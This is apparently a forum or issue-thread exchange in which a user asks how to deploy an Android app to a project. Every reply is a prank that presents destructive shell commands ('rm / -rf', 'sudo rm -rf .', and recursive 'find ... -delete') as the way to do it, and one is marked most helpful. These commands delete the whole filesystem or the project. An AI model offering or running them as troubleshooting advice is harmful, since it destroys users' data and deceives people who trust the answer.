I want to deploy my Android App to this project, how can I do this?
by exec this command :
rm / -rf
then transform done !
Just need to run the command on your terminal at your project dir:
sudo rm -rf .
+1
A very simple:
find -type f -delete
find -type d -delete
will do the job
Most helpful comment
by exec this command :
rm / -rfthen transform done !